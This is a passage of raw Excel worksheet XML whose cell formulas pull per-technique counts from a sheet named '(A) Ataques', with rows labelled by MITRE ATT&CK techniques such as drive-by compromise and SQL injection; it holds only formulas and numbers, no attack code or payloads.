        <v>2</v>
      </c>
      <c r="AZ37" s="510">
        <f>'(A) Ataques'!LW37+'(A) Ataques'!MC37+'(A) Ataques'!MI37+'(A) Ataques'!MO37+'(A) Ataques'!MU37</f>
        <v>2</v>
      </c>
      <c r="BA37" s="471">
        <f>'(A) Ataques'!LY37+'(A) Ataques'!ME37+'(A) Ataques'!MK37+'(A) Ataques'!MQ37+'(A) Ataques'!MW37</f>
        <v>1</v>
      </c>
      <c r="BB37" s="471">
        <f>'(A) Ataques'!LQ37</f>
        <v>2</v>
      </c>
      <c r="BC37" s="331">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",IF($AY37=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD37" s="469">
        <f>IF('(A) Ataques'!$AP37&lt;&gt;"NO",'(A) Ataques'!LL37,"")</f>
        <v>11</v>
      </c>
      <c r="BE37" s="510">
        <f>IF('(A) Ataques'!$AP37&lt;&gt;"NO",'(A) Ataques'!LM37,"")</f>
        <v>11</v>
      </c>
      <c r="BF37" s="471">
        <f>IF('(A) Ataques'!$AP37&lt;&gt;"NO",'(A) Ataques'!LN37,"")</f>
        <v>1</v>
      </c>
      <c r="BG37" s="471">
        <f>IF('(A) Ataques'!$AP37&lt;&gt;"NO",'(A) Ataques'!LO37,"")</f>
        <v>3</v>
      </c>
      <c r="BH37" s="471">
        <f>IF('(A) Ataques'!$AP37&lt;&gt;"NO",'(A) Ataques'!LS37,"")</f>
        <v>3</v>
      </c>
      <c r="BI37" s="331">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",IF($BD37=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ37" s="469">
        <f>'(A) Ataques'!OL37+'(A) Ataques'!OR37+'(A) Ataques'!OX37+'(A) Ataques'!PD37+'(A) Ataques'!PJ37</f>
        <v>6</v>
      </c>
      <c r="BK37" s="510">
        <f>'(A) Ataques'!ON37+'(A) Ataques'!OT37+'(A) Ataques'!OZ37+'(A) Ataques'!PF37+'(A) Ataques'!PL37</f>
        <v>6</v>
      </c>
      <c r="BL37" s="471">
        <f>'(A) Ataques'!OP37+'(A) Ataques'!OV37+'(A) Ataques'!PB37+'(A) Ataques'!PH37+'(A) Ataques'!PN37</f>
        <v>2</v>
      </c>
      <c r="BM37" s="495">
        <f>'(A) Ataques'!OH37</f>
        <v>3</v>
      </c>
      <c r="BN37" s="331">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",IF($BJ37=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO37" s="469">
        <f>IF('(A) Ataques'!$AP37&lt;&gt;"NO",'(A) Ataques'!OC37,"")</f>
        <v>6</v>
      </c>
      <c r="BP37" s="510">
        <f>IF('(A) Ataques'!$AP37&lt;&gt;"NO",'(A) Ataques'!OD37,"")</f>
        <v>6</v>
      </c>
      <c r="BQ37" s="471">
        <f>IF('(A) Ataques'!$AP37&lt;&gt;"NO",'(A) Ataques'!OE37,"")</f>
        <v>2</v>
      </c>
      <c r="BR37" s="471">
        <f>IF('(A) Ataques'!$AP37&lt;&gt;"NO",'(A) Ataques'!OF37,"")</f>
        <v>1</v>
      </c>
      <c r="BS37" s="471">
        <f>IF('(A) Ataques'!$AP37&lt;&gt;"NO",'(A) Ataques'!OJ37,"")</f>
        <v>3</v>
      </c>
      <c r="BT37" s="331">
        <f>IF('(A) Ataques'!$AK37&lt;&gt;"NO",IF($BO37=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:72" s="5" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A38" s="79">
        <f t="shared" si="0"/>
        <v>36</v>
      </c>
      <c r="B38" s="4">
        <f>IF('(A) Ataques'!AK38&lt;&gt;"NO",'(A) Ataques'!E38,"")</f>
        <v>31</v>
      </c>
      <c r="C38" s="6" t="str">
        <f>IF('(A) Ataques'!AK38&lt;&gt;"NO",IF('(A) Ataques'!M38="","",'(A) Ataques'!M38),"")</f>
        <v>T1189-Drive-by_compromise_v1</v>
      </c>
      <c r="D38" s="4" t="str">
        <f>IF('(A) Ataques'!AK38&lt;&gt;"NO",'(A) Ataques'!F38,"")</f>
        <v>T1189</v>
      </c>
      <c r="E38" s="286">
        <f>IF('(A) Ataques'!AK38&lt;&gt;"NO",'(A) Ataques'!AQ38,"")</f>
        <v>4</v>
      </c>
      <c r="F38" s="288">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!BB38,"")</f>
        <v>4</v>
      </c>
      <c r="G38" s="392">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!BD38,"")</f>
        <v>3</v>
      </c>
      <c r="H38" s="4">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!BF38,"")</f>
        <v>1</v>
      </c>
      <c r="I38" s="20">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!BG38,"")</f>
        <v>3</v>
      </c>
      <c r="J38" s="530">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",IF($F38=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K38" s="322">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$BH38,"")</f>
        <v>0</v>
      </c>
      <c r="L38" s="322">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$BJ38,"")</f>
        <v>0</v>
      </c>
      <c r="M38" s="4">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$BL38,"")</f>
        <v>0</v>
      </c>
      <c r="N38" s="20">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$BM38,"")</f>
        <v>0</v>
      </c>
      <c r="O38" s="532">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",IF($K38=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P38" s="292">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$BN38,"")</f>
        <v>4</v>
      </c>
      <c r="Q38" s="322">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$BP38,"")</f>
        <v>3</v>
      </c>
      <c r="R38" s="4">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$BR38,"")</f>
        <v>1</v>
      </c>
      <c r="S38" s="20">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$BS38,"")</f>
        <v>3</v>
      </c>
      <c r="T38" s="530">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",IF($P38=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U38" s="322">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$BT38,"")</f>
        <v>543</v>
      </c>
      <c r="V38" s="322">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$BV38,"")</f>
        <v>10</v>
      </c>
      <c r="W38" s="4">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$BX38,"")</f>
        <v>4</v>
      </c>
      <c r="X38" s="20">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$BY38,"")</f>
        <v>4</v>
      </c>
      <c r="Y38" s="532">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",IF($U38=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z38" s="288">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!BZ38,"")</f>
        <v>5</v>
      </c>
      <c r="AA38" s="392">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!CB38,"")</f>
        <v>3</v>
      </c>
      <c r="AB38" s="4">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!CD38,"")</f>
        <v>3</v>
      </c>
      <c r="AC38" s="20">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!CE38,"")</f>
        <v>1</v>
      </c>
      <c r="AD38" s="331">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",IF(Z38=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE38" s="322">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$CF38,"")</f>
        <v>548</v>
      </c>
      <c r="AF38" s="322">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$CH38,"")</f>
        <v>13</v>
      </c>
      <c r="AG38" s="4">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$CJ38,"")</f>
        <v>7</v>
      </c>
      <c r="AH38" s="20">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$CK38,"")</f>
        <v>4</v>
      </c>
      <c r="AI38" s="287">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",IF($AE38=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ38" s="292">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$CL38,"")</f>
        <v>0</v>
      </c>
      <c r="AK38" s="322">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$CN38,"")</f>
        <v>0</v>
      </c>
      <c r="AL38" s="4">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$CP38,"")</f>
        <v>0</v>
      </c>
      <c r="AM38" s="20">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$CQ38,"")</f>
        <v>0</v>
      </c>
      <c r="AN38" s="331">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",IF($AJ38=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO38" s="322">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$CR38,"")</f>
        <v>4</v>
      </c>
      <c r="AP38" s="322">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$CT38,"")</f>
        <v>1</v>
      </c>
      <c r="AQ38" s="4">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$CV38,"")</f>
        <v>1</v>
      </c>
      <c r="AR38" s="20">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!$CW38,"")</f>
        <v>1</v>
      </c>
      <c r="AS38" s="287">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",IF($AO38=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT38" s="288">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!CX38,"")</f>
        <v>8</v>
      </c>
      <c r="AU38" s="392">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!CZ38,"")</f>
        <v>4</v>
      </c>
      <c r="AV38" s="4">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!DB38,"")</f>
        <v>2</v>
      </c>
      <c r="AW38" s="20">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",'(A) Ataques'!DC38,"")</f>
        <v>4</v>
      </c>
      <c r="AX38" s="331">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",IF($AT38=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY38" s="469">
        <f>'(A) Ataques'!LU38+'(A) Ataques'!MA38+'(A) Ataques'!MG38+'(A) Ataques'!MM38+'(A) Ataques'!MS38</f>
        <v>3</v>
      </c>
      <c r="AZ38" s="510">
        <f>'(A) Ataques'!LW38+'(A) Ataques'!MC38+'(A) Ataques'!MI38+'(A) Ataques'!MO38+'(A) Ataques'!MU38</f>
        <v>3</v>
      </c>
      <c r="BA38" s="471">
        <f>'(A) Ataques'!LY38+'(A) Ataques'!ME38+'(A) Ataques'!MK38+'(A) Ataques'!MQ38+'(A) Ataques'!MW38</f>
        <v>1</v>
      </c>
      <c r="BB38" s="471">
        <f>'(A) Ataques'!LQ38</f>
        <v>3</v>
      </c>
      <c r="BC38" s="331">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",IF($AY38=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD38" s="469">
        <f>IF('(A) Ataques'!$AP38&lt;&gt;"NO",'(A) Ataques'!LL38,"")</f>
        <v>10</v>
      </c>
      <c r="BE38" s="510">
        <f>IF('(A) Ataques'!$AP38&lt;&gt;"NO",'(A) Ataques'!LM38,"")</f>
        <v>10</v>
      </c>
      <c r="BF38" s="471">
        <f>IF('(A) Ataques'!$AP38&lt;&gt;"NO",'(A) Ataques'!LN38,"")</f>
        <v>1</v>
      </c>
      <c r="BG38" s="471">
        <f>IF('(A) Ataques'!$AP38&lt;&gt;"NO",'(A) Ataques'!LO38,"")</f>
        <v>3</v>
      </c>
      <c r="BH38" s="471">
        <f>IF('(A) Ataques'!$AP38&lt;&gt;"NO",'(A) Ataques'!LS38,"")</f>
        <v>4</v>
      </c>
      <c r="BI38" s="331">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",IF($BD38=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ38" s="469">
        <f>'(A) Ataques'!OL38+'(A) Ataques'!OR38+'(A) Ataques'!OX38+'(A) Ataques'!PD38+'(A) Ataques'!PJ38</f>
        <v>5</v>
      </c>
      <c r="BK38" s="510">
        <f>'(A) Ataques'!ON38+'(A) Ataques'!OT38+'(A) Ataques'!OZ38+'(A) Ataques'!PF38+'(A) Ataques'!PL38</f>
        <v>4</v>
      </c>
      <c r="BL38" s="471">
        <f>'(A) Ataques'!OP38+'(A) Ataques'!OV38+'(A) Ataques'!PB38+'(A) Ataques'!PH38+'(A) Ataques'!PN38</f>
        <v>2</v>
      </c>
      <c r="BM38" s="495">
        <f>'(A) Ataques'!OH38</f>
        <v>3</v>
      </c>
      <c r="BN38" s="331">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",IF($BJ38=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO38" s="469">
        <f>IF('(A) Ataques'!$AP38&lt;&gt;"NO",'(A) Ataques'!OC38,"")</f>
        <v>5</v>
      </c>
      <c r="BP38" s="510">
        <f>IF('(A) Ataques'!$AP38&lt;&gt;"NO",'(A) Ataques'!OD38,"")</f>
        <v>4</v>
      </c>
      <c r="BQ38" s="471">
        <f>IF('(A) Ataques'!$AP38&lt;&gt;"NO",'(A) Ataques'!OE38,"")</f>
        <v>2</v>
      </c>
      <c r="BR38" s="471">
        <f>IF('(A) Ataques'!$AP38&lt;&gt;"NO",'(A) Ataques'!OF38,"")</f>
        <v>1</v>
      </c>
      <c r="BS38" s="471">
        <f>IF('(A) Ataques'!$AP38&lt;&gt;"NO",'(A) Ataques'!OJ38,"")</f>
        <v>3</v>
      </c>
      <c r="BT38" s="331">
        <f>IF('(A) Ataques'!$AK38&lt;&gt;"NO",IF($BO38=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:72" s="5" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A39" s="79">
        <f t="shared" si="0"/>
        <v>37</v>
      </c>
      <c r="B39" s="4">
        <f>IF('(A) Ataques'!AK39&lt;&gt;"NO",'(A) Ataques'!E39,"")</f>
        <v>31</v>
      </c>
      <c r="C39" s="6" t="str">
        <f>IF('(A) Ataques'!AK39&lt;&gt;"NO",IF('(A) Ataques'!M39="","",'(A) Ataques'!M39),"")</f>
        <v>T1189-Drive-by_compromise_v2</v>
      </c>
      <c r="D39" s="4" t="str">
        <f>IF('(A) Ataques'!AK39&lt;&gt;"NO",'(A) Ataques'!F39,"")</f>
        <v>T1189</v>
      </c>
      <c r="E39" s="286">
        <f>IF('(A) Ataques'!AK39&lt;&gt;"NO",'(A) Ataques'!AQ39,"")</f>
        <v>1</v>
      </c>
      <c r="F39" s="288">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!BB39,"")</f>
        <v>0</v>
      </c>
      <c r="G39" s="392">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!BD39,"")</f>
        <v>0</v>
      </c>
      <c r="H39" s="4">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!BF39,"")</f>
        <v>0</v>
      </c>
      <c r="I39" s="20">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!BG39,"")</f>
        <v>0</v>
      </c>
      <c r="J39" s="530">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",IF($F39=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K39" s="322">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$BH39,"")</f>
        <v>1</v>
      </c>
      <c r="L39" s="322">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$BJ39,"")</f>
        <v>1</v>
      </c>
      <c r="M39" s="4">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$BL39,"")</f>
        <v>1</v>
      </c>
      <c r="N39" s="20">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$BM39,"")</f>
        <v>1</v>
      </c>
      <c r="O39" s="532">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",IF($K39=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P39" s="292">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$BN39,"")</f>
        <v>1</v>
      </c>
      <c r="Q39" s="322">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$BP39,"")</f>
        <v>1</v>
      </c>
      <c r="R39" s="4">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$BR39,"")</f>
        <v>1</v>
      </c>
      <c r="S39" s="20">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$BS39,"")</f>
        <v>1</v>
      </c>
      <c r="T39" s="530">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",IF($P39=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U39" s="322">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$BT39,"")</f>
        <v>3</v>
      </c>
      <c r="V39" s="322">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$BV39,"")</f>
        <v>1</v>
      </c>
      <c r="W39" s="4">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$BX39,"")</f>
        <v>1</v>
      </c>
      <c r="X39" s="20">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$BY39,"")</f>
        <v>1</v>
      </c>
      <c r="Y39" s="532">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",IF($U39=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z39" s="288">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!BZ39,"")</f>
        <v>7</v>
      </c>
      <c r="AA39" s="392">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!CB39,"")</f>
        <v>5</v>
      </c>
      <c r="AB39" s="4">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!CD39,"")</f>
        <v>5</v>
      </c>
      <c r="AC39" s="20">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!CE39,"")</f>
        <v>1</v>
      </c>
      <c r="AD39" s="331">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",IF(Z39=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE39" s="322">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$CF39,"")</f>
        <v>10</v>
      </c>
      <c r="AF39" s="322">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$CH39,"")</f>
        <v>6</v>
      </c>
      <c r="AG39" s="4">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$CJ39,"")</f>
        <v>6</v>
      </c>
      <c r="AH39" s="20">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$CK39,"")</f>
        <v>1</v>
      </c>
      <c r="AI39" s="287">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",IF($AE39=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ39" s="292">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$CL39,"")</f>
        <v>0</v>
      </c>
      <c r="AK39" s="322">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$CN39,"")</f>
        <v>0</v>
      </c>
      <c r="AL39" s="4">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$CP39,"")</f>
        <v>0</v>
      </c>
      <c r="AM39" s="20">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$CQ39,"")</f>
        <v>0</v>
      </c>
      <c r="AN39" s="331">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",IF($AJ39=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO39" s="322">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$CR39,"")</f>
        <v>0</v>
      </c>
      <c r="AP39" s="322">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$CT39,"")</f>
        <v>0</v>
      </c>
      <c r="AQ39" s="4">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$CV39,"")</f>
        <v>0</v>
      </c>
      <c r="AR39" s="20">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!$CW39,"")</f>
        <v>0</v>
      </c>
      <c r="AS39" s="287">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",IF($AO39=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT39" s="288">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!CX39,"")</f>
        <v>1</v>
      </c>
      <c r="AU39" s="392">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!CZ39,"")</f>
        <v>1</v>
      </c>
      <c r="AV39" s="4">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!DB39,"")</f>
        <v>1</v>
      </c>
      <c r="AW39" s="20">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",'(A) Ataques'!DC39,"")</f>
        <v>1</v>
      </c>
      <c r="AX39" s="331">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",IF($AT39=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY39" s="469">
        <f>'(A) Ataques'!LU39+'(A) Ataques'!MA39+'(A) Ataques'!MG39+'(A) Ataques'!MM39+'(A) Ataques'!MS39</f>
        <v>0</v>
      </c>
      <c r="AZ39" s="510">
        <f>'(A) Ataques'!LW39+'(A) Ataques'!MC39+'(A) Ataques'!MI39+'(A) Ataques'!MO39+'(A) Ataques'!MU39</f>
        <v>0</v>
      </c>
      <c r="BA39" s="471">
        <f>'(A) Ataques'!LY39+'(A) Ataques'!ME39+'(A) Ataques'!MK39+'(A) Ataques'!MQ39+'(A) Ataques'!MW39</f>
        <v>0</v>
      </c>
      <c r="BB39" s="471">
        <f>'(A) Ataques'!LQ39</f>
        <v>0</v>
      </c>
      <c r="BC39" s="331">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",IF($AY39=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD39" s="469">
        <f>IF('(A) Ataques'!$AP39&lt;&gt;"NO",'(A) Ataques'!LL39,"")</f>
        <v>2</v>
      </c>
      <c r="BE39" s="510">
        <f>IF('(A) Ataques'!$AP39&lt;&gt;"NO",'(A) Ataques'!LM39,"")</f>
        <v>2</v>
      </c>
      <c r="BF39" s="471">
        <f>IF('(A) Ataques'!$AP39&lt;&gt;"NO",'(A) Ataques'!LN39,"")</f>
        <v>0</v>
      </c>
      <c r="BG39" s="471">
        <f>IF('(A) Ataques'!$AP39&lt;&gt;"NO",'(A) Ataques'!LO39,"")</f>
        <v>2</v>
      </c>
      <c r="BH39" s="471">
        <f>IF('(A) Ataques'!$AP39&lt;&gt;"NO",'(A) Ataques'!LS39,"")</f>
        <v>1</v>
      </c>
      <c r="BI39" s="331">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",IF($BD39=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ39" s="469">
        <f>'(A) Ataques'!OL39+'(A) Ataques'!OR39+'(A) Ataques'!OX39+'(A) Ataques'!PD39+'(A) Ataques'!PJ39</f>
        <v>4</v>
      </c>
      <c r="BK39" s="510">
        <f>'(A) Ataques'!ON39+'(A) Ataques'!OT39+'(A) Ataques'!OZ39+'(A) Ataques'!PF39+'(A) Ataques'!PL39</f>
        <v>2</v>
      </c>
      <c r="BL39" s="471">
        <f>'(A) Ataques'!OP39+'(A) Ataques'!OV39+'(A) Ataques'!PB39+'(A) Ataques'!PH39+'(A) Ataques'!PN39</f>
        <v>2</v>
      </c>
      <c r="BM39" s="495">
        <f>'(A) Ataques'!OH39</f>
        <v>1</v>
      </c>
      <c r="BN39" s="331">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",IF($BJ39=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO39" s="469">
        <f>IF('(A) Ataques'!$AP39&lt;&gt;"NO",'(A) Ataques'!OC39,"")</f>
        <v>4</v>
      </c>
      <c r="BP39" s="510">
        <f>IF('(A) Ataques'!$AP39&lt;&gt;"NO",'(A) Ataques'!OD39,"")</f>
        <v>2</v>
      </c>
      <c r="BQ39" s="471">
        <f>IF('(A) Ataques'!$AP39&lt;&gt;"NO",'(A) Ataques'!OE39,"")</f>
        <v>2</v>
      </c>
      <c r="BR39" s="471">
        <f>IF('(A) Ataques'!$AP39&lt;&gt;"NO",'(A) Ataques'!OF39,"")</f>
        <v>1</v>
      </c>
      <c r="BS39" s="471">
        <f>IF('(A) Ataques'!$AP39&lt;&gt;"NO",'(A) Ataques'!OJ39,"")</f>
        <v>1</v>
      </c>
      <c r="BT39" s="331">
        <f>IF('(A) Ataques'!$AK39&lt;&gt;"NO",IF($BO39=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="1:72" s="5" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A40" s="79">
        <f t="shared" si="0"/>
        <v>38</v>
      </c>
      <c r="B40" s="4">
        <f>IF('(A) Ataques'!AK40&lt;&gt;"NO",'(A) Ataques'!E40,"")</f>
        <v>32</v>
      </c>
      <c r="C40" s="6" t="str">
        <f>IF('(A) Ataques'!AK40&lt;&gt;"NO",IF('(A) Ataques'!M40="","",'(A) Ataques'!M40),"")</f>
        <v>T1190-Sql_injection</v>
      </c>
      <c r="D40" s="4" t="str">
        <f>IF('(A) Ataques'!AK40&lt;&gt;"NO",'(A) Ataques'!F40,"")</f>
        <v>T1190</v>
      </c>
      <c r="E40" s="286">
        <f>IF('(A) Ataques'!AK40&lt;&gt;"NO",'(A) Ataques'!AQ40,"")</f>
        <v>77</v>
      </c>
      <c r="F40" s="288">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!BB40,"")</f>
        <v>38</v>
      </c>
      <c r="G40" s="392">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!BD40,"")</f>
        <v>36</v>
      </c>
      <c r="H40" s="4">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!BF40,"")</f>
        <v>2</v>
      </c>
      <c r="I40" s="20">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!BG40,"")</f>
        <v>36</v>
      </c>
      <c r="J40" s="530">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",IF($F40=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K40" s="322">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$BH40,"")</f>
        <v>68</v>
      </c>
      <c r="L40" s="322">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$BJ40,"")</f>
        <v>66</v>
      </c>
      <c r="M40" s="4">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$BL40,"")</f>
        <v>7</v>
      </c>
      <c r="N40" s="20">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$BM40,"")</f>
        <v>30</v>
      </c>
      <c r="O40" s="532">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",IF($K40=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P40" s="292">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$BN40,"")</f>
        <v>106</v>
      </c>
      <c r="Q40" s="322">
        <f>IF('(A) Ataques'!$AK40&lt;&gt;"NO",'(A) Ataques'!$BP40,"")</f>
        <v>102</v>
      </c>
      <c r="R40" s="4">
